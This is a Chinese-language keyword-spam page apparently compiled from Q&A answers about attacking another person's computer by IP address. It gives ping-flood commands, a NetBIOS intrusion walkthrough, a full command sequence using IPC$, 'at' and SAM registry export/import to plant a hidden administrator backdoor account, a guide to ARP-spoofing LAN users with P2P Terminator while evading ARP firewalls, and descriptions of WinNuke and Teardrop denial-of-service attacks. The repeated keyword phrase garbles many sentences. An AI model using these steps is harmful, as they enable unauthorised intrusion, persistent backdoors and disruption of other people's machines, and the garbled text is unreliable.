攻击对方ip软件_攻击对方ip软件
作者:hacker | 分类:渗透破解 | 浏览:229 | 日期:2022年12月25日怎么攻击对方电脑?以知对方IP,且对方在线
点击开始→运行→cmd→输入 ping 加他的IP -l size -t 以下可借鉴: 下面介绍一种WIN9X下的入侵方法: 1.取得对方IP地址如XX.XX.XX.XX攻击对方ip软件,方法太多不细讲攻击对方ip软件了。 2.判断对方上网的地点,开个DOS窗口键入 TRACERT XX.XX.XX.XX 第4和第5行反映的信息既是对方的上网地点。 3.得到对方电脑的名称,开个DOS窗口键入 NBTSTAT -A XX.XX.XX.XX 第一行是对方电脑名称 第二行是对方电脑所在工作组第三行是对方电脑的说明 4.在Windows目录下有一文件名为LMHOSTS.SAM,将其改名为LMHOSTS,删除其内容,将对方的IP及电脑名按以下格式写入文件攻击对方ip软件: XX.XX.XX.XX 电脑名 5.开DOS窗口键入 NBTSTAT -R 6.在开始-查找-电脑中输入对方电脑名,出现对方电脑点击即可进入。以上方法请不要乱用,本人对你用上面的方法所惹出的麻烦概不负责,请慎重。 对付上面进攻的最好办法就是隐藏你的IP地址。 ping 命令的用法Ping Ping是个使用频率极高的实用程序,用于确定本地主机是否能与另一台主机交换(发送与接收)数据报。根据返回的信息,你就可以推断TCP/IP参数是否设置得正确以及运行是否正常。需要注意的是攻击对方ip软件:成功地与另一台主机进行一次或两次数据报交换并不表示TCP/IP配置就是正确的,你必须执行大量的本地主机与远程主机的数据报交换,才能确信TCP/IP的正确性。 简单的说,Ping就是一个测试程序,如果Ping运行正确,你大体上就可以排除网络访问层、网卡、MODEM的输入输出线路、电缆和路由器等存在的故障,从而减小了问题的范围。但由于可以自定义所发数据报的大小及无休止的高速发送,Ping也被某些别有用心的人作为DDOS(拒绝服务攻击)的工具,前段时间Yahoo就是被黑客利用数百台可以高速接入互联网的电脑连续发送大量Ping数据报而瘫痪的。 按照缺省设置,Windows上运行的Ping命令发送4个ICMP(网间控制报文协议)回送请求,每个32字节数据,如果一切正常,你应能得到4个回送应答。 Ping能够以毫秒为单位显示发送回送请求到返回回送应答之间的时间量。如果应答时间短,表示数据报不必通过太多的路由器或网络连接速度比较快。Ping还能显示TTL(Time To Live存在时间)值,你可以通过TTL值推算一下数据包已经通过了多少个路由器:源地点TTL起始值(就是比返回TTL略大的一个2的乘方数)-返回时TTL值。例如,返回TTL值为119,那么可以推算数据报离开源地址的TTL起始值为128,而源地点到目标地点要通过9个路由器网段(128-119);如果返回TTL值为246,TTL起始值就是256,源地点到目标地点要通过9个路由器网段。 通过Ping检测网络故障的典型次序 正常情况下,当你使用Ping命令来查找问题所在或检验网络运行情况时,你需要使用许多Ping命令,如果所有都运行正确,你就可以相信基本的连通性和配置参数没有问题;如果某些Ping命令出现运行故障,它也可以指明到何处去查找问题。下面就给出一个典型的检测次序及对应的可能故障: ping 127.0.0.1--这个Ping命令被送到本地计算机的IP软件,该命令永不退出该计算机。如果没有做到这一点,就表示TCP/IP的安装或运行存在某些最基本的问题。 ping 本机IP--这个命令被送到你计算机所配置的IP地址,你的计算机始终都应该对该Ping命令作出应答,如果没有,则表示本地配置或安装存在问题。出现此问题时,局域网用户请断开网络电缆,然后重新发送该命令。如果网线断开后本命令正确,则表示另一台计算机可能配置了相同的IP地址。 ping 局域网内其他IP--这个命令应该离开你的计算机,经过网卡及网络电缆到达其他计算机,再返回。收到回送应答表明本地网络中的网卡和载体运行正确。但如果收到0个回送应答,那么表示子网掩码(进行子网分割时,将IP地址的网络部分与主机部分分开的代码)不正确或网卡配置错误或电缆系统有问题。 ping 网关IP--这个命令如果应答正确,表示局域网中的网关路由器正在运行并能够作出应答。 ping 远程IP--如果收到4个应答,表示成功的使用了
谁知道怎样在局域网攻击别人电脑,或者有什么好的软件介绍个!
我可以告诉你一个办法不过需要对象的用户名和口令,还要知道他的IP
地址,只要你知道拿到账号和密码半个小时就可以搞定,以后你就有一个自己的隐藏管理员账户,随便进入他的电脑。
在这里将用at的命令,因为用at产生的计划任务是以系统身份运行的,所以也用不到psu.exe程序。为了能够使用at命令,肉鸡必须开有schedule的服务,如果没有开启,可用流光里带的工具netsvc.exe或sc.exe来远程启动,当然其方法也可以,只要能启动schedule服务就行。
对于命令行方式,你可以采用各种连接方式,如用SQLexec连接MSSQL的1433端口,也可以用telnet服务,只要以你能得到一个cmdshell,并且有运行at命令的权限就可以。
1.这里先假设他的用户名为administrator,密码为12345678,现在我们开始在命令行下远程为它建立隐藏的超级用户。(假设主机是局域网内的一台主机,ip地址为13.50.97.238,。)
2.先与他建立连接:
net
use
\\13.50.97.238\ipc$
"12345678"
/user:"Administrator”
3.用at命令在他的电脑建立一个用户(如果at服务没有启动,可用netsvc.exe或sc.exe来远程启动):
at
\\13.50.97.238
12:51
c:\windows\system32\net.exe
user
hacker$
1234
/add
建立这个加有$符的用户名,是因为加有$符后,命令行下用net
user将不显示这个用户,但在帐户管理器却能看到这个用户。
4.同样用at命令导出HKEY_LOCAL_MACHINE\sam\sam\Domains\account\users下键值:
at
\\13.50.97.238
12:55
c:\windows\regedit.exe
/e
hacker.reg
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\account\users
/e
是regedit.exe的参数,在这里HKEY_LOCAL_MACHINE\SAM\SAM\Domains\account\users这个键的一定不要以“\“结尾。必要的情况下可以用引号将"c:\windows\regedit.exe
/e
hacker.reg
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\account\users"引起来。
5.将他的电脑上的hacker.reg下载到本机上用记事本打开进行编辑命令为:
Copy
\\13.50.97.238\admin$\system32\hacker.reg
c:\hacker.reg
6.再将编辑好的hacker.reg拷回他的电脑上
copy
c:\hacker.reg
\\13.50.97.238\admin$\system32\hacker1.reg
7.查看他的电脑时间:net
time
\\13.50.97.238然后用at命令将用户hacker$删除:
at
\\13.50.97.238
13:40
net
user
hacker$
/del
8.验证hacker$是否删除:net
use
\\13.50.97.238
/del
断开与他的电脑连接。
再用net
use
\\13.50.97.238\ipc$
"1234"
/user:"hacker$"
用帐户hacker$与他电脑连接,不能连接说明已删除。
9.再与他电脑建立连接:
net
use
\\13.50.97.238\ipc$
"12345678"
/user:"administrator"
再取得他的时间,用at命令将拷回他的hacker1.reg导入他的注册表:
at
\\13.50.97.238
13:41
c:\windows\regedit.exe
/s
hacker1.reg
regedit.exe的参数/s是指安静模式。
10.再验证hacker$是否已建立,方法同上面验证hacker$是否被删除一样。
11.再验证用户hacker$是否有读、写、删除的权限,如果不放心,你还可验证是否能建立其它帐户。
12.通过步骤11可以断定用户hacker$具有超级用户权限,因为最初我用at命令建立它的时候是一个普通用户,而现在却具有远程读、写、删除的权限。
OK
以后你可以随意拿你的账号进入他电脑里游荡了~~~~~~~~~~~~~~~
有没有一种软件,输入对方IP就能让他死机?
听说以前好象有一款黑软叫"ip炸弹"攻击对方ip软件的,你去找找看.攻击对方ip软件我怕中毒所以就不帮你找了.黑软基地攻击对方ip软件的网站好像是 上面全是攻击工具,我记得好象一进那个网站好象是会中毒你做好心理准备吧^_^!!~
需要一个pc软件 类似安卓用的WiFikiller 或者其他限制或杀掉其他ip的软件 效果好的话有加分
推荐p2pover终结者攻击对方ip软件,p2p终结者是一款局域网控制软件攻击对方ip软件,他攻击对方ip软件的主要功能就是控制和限制同一个局域网内其它的上网用户,如限制不让别人上QQ,不让别人开网页和不让别人下载,只要在同一网之内你就可以控制他。
1.安装完成后,在使用之前要先进行配置,进入软件配置界面,选择你连接网络所用的网卡,下面就会显示网卡的当前IP地址、子网掩码、MAC地址和网关地址。
2.在“控制设置”中建议勾选启动后自动开启控制网络 及发现新主机自动对其进行控制(防止新接入主机不受控制),为了避免被其它人安装的ARP防火墙探测到你正在使用P2P终结者,可以勾选“启用反ARP防护墙追踪模式”,启用该选项后,对方ARP防火墙将无法发现ARP攻击IP地址,但是依然能够顺利的阻挡P2P终结者的控制。
3.从“主机列表”中我们可以清楚的看到局域网中每台主机的带宽使用情况。如果有些主机没有显示出来,可以点击“扫描网络”来刷新主机列表。
4.创建一个时间计划,也就是设置在什么时间段运行什么规则。点击“系统设置→时间计划设置→新建”进入时间计划设置,选中想要生效的时间段就可以了。接着再创建该时间计划对应的控制规则“系统设置→控制规则设置→新建”进入控制规则设置向导。
5.编辑好规则后,只需要切换回“系统运行信息→网络主机列表”找到需要控制的主机,点击鼠标右键,在右键菜单中选择“为选中主机制定规则”,然后选择一个需要应用到该主机的规则,就可以用设定的规则在制定的时间段来控制该主机的联网活动了。
6.如果发现对某个主机没有成功的进行限制,一是没有没有勾选在“网络主机列表”里对应的主机,一是没有点击“启动控制”按钮,再者就是对方使用了ARP防火墙,对于安装了ARP防火墙的主机,P2P终结者无能为力。
怎样攻击IP地址??
1.OOB攻击
这是利用NETBIOS中一个OOB
(Out
of
Band)的漏洞而来进行的,它的原理是通过TCP/IP协议传递一个数据包到计算机某个开放的端口上(一般是137、138和139),当计算机收到这个数据包之后就会瞬间死机或者蓝屏现象,不重新启动计算机就无法继续使用TCP/IP协议来访问网络。
2.DoS攻击
这是针对Windows
9X所使用的ICMP协议进行的DOS(Denial
of
Service,拒绝服务)攻击,一般来说,这种攻击是利用对方计算机上所安装协议的漏洞来连续发送大量的数据包,造成对方计算机的死机。
3.WinNuke攻击
目前的WinNuke系列工具已经从最初的简单选择IP攻击某个端口发展到可以攻击一个IP区间范围的计算机,并且可以进行连续攻击,还能够验证攻击的效果,还可以对检测和选择端口,所以使用它可以造成某一个IP地址区间的计算机全部蓝屏死机。
4.SSPing
这是一个IP攻击工具,它的工作原理是向对方的计算机连续发出大型的ICMP数据包,被攻击的机器此时会试图将这些文件包合并处理,从而造成系统死机。
5.TearDrop攻击
这种攻击方式利用那些在TCP/IP堆栈实现中信任IP碎片中的包的标题头所包含的信息来实现自己的攻击,由于IP分段中含有指示该分段所包含的是原包哪一段的信息,所以一些操作系统下的TCP/IP协议在收到含有重叠偏移的伪造分段时将崩溃。TeadDrop最大的特点是除了能够对Windows
9X/NT进行攻击之外,连Linux也不能幸免。